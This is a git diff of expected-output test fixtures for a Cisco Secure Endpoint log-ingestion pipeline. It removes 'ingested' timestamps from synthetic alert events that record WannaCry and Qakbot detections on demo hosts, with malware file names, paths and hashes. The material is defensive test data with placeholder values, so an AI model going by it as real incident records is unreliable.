 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -3996,7 +3948,6 @@
 ],
 "code": "1090519054",
 "id": "6419204905956803000",
- "ingested": "2022-02-02T05:53:17.131285082Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
 "severity": 2
@@ -4093,7 +4044,6 @@
 ],
 "code": "1090519054",
 "id": "6419204905956803000",
- "ingested": "2022-02-02T05:53:17.131285847Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -4177,7 +4127,6 @@
 ],
 "code": "553648143",
 "id": "6419204905956803000",
- "ingested": "2022-02-02T05:53:17.131286709Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "severity": 2
@@ -4253,7 +4202,6 @@
 ],
 "code": "2164260880",
 "id": "6419204901661835000",
- "ingested": "2022-02-02T05:53:17.131287469Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -4329,7 +4277,6 @@
 ],
 "code": "2164260880",
 "id": "6419204901661835000",
- "ingested": "2022-02-02T05:53:17.131288251Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
index 474df773a06..51dc257ae45 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
@@ -46,7 +46,6 @@
 ],
 "code": "2164260880",
 "id": "6419204901661835000",
- "ingested": "2022-02-02T05:53:29.530496194Z",
 "kind": "alert",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
 "severity": 2
@@ -120,7 +119,6 @@ ], "code": "1090519054", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530499932Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -206,7 +204,6 @@ ], "code": "1090519054", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530501210Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -292,7 +289,6 @@ ], "code": "1090519054", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530502346Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -382,7 +378,6 @@ ], "code": "1090519054", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530503370Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -470,7 +465,6 @@ ], "code": "553648143", "id": "6419204901661835000", - "ingested": "2022-02-02T05:53:29.530504375Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -546,7 +540,6 @@ ], "code": "2164260880", "id": "6411462922463085000", - "ingested": "2022-02-02T05:53:29.530505377Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 2 
@@ -618,7 +611,6 @@ ], "code": "553648143", "id": "6411462922463085000", - "ingested": "2022-02-02T05:53:29.530506442Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 2 
@@ -692,7 +684,6 @@ ], "code": "1090519054", "id": "6411462918168117000", - "ingested": "2022-02-02T05:53:29.530507635Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", "severity": 2 
@@ -782,7 +773,6 @@ ], "code": "553648147", "id": "6411456342573187000", - "ingested": "2022-02-02T05:53:29.530508742Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "severity": 3 
@@ -862,7 +852,6 @@ ], "code": "553648147", "id": "6411456342573187000", - "ingested": "2022-02-02T05:53:29.530509787Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "severity": 3 
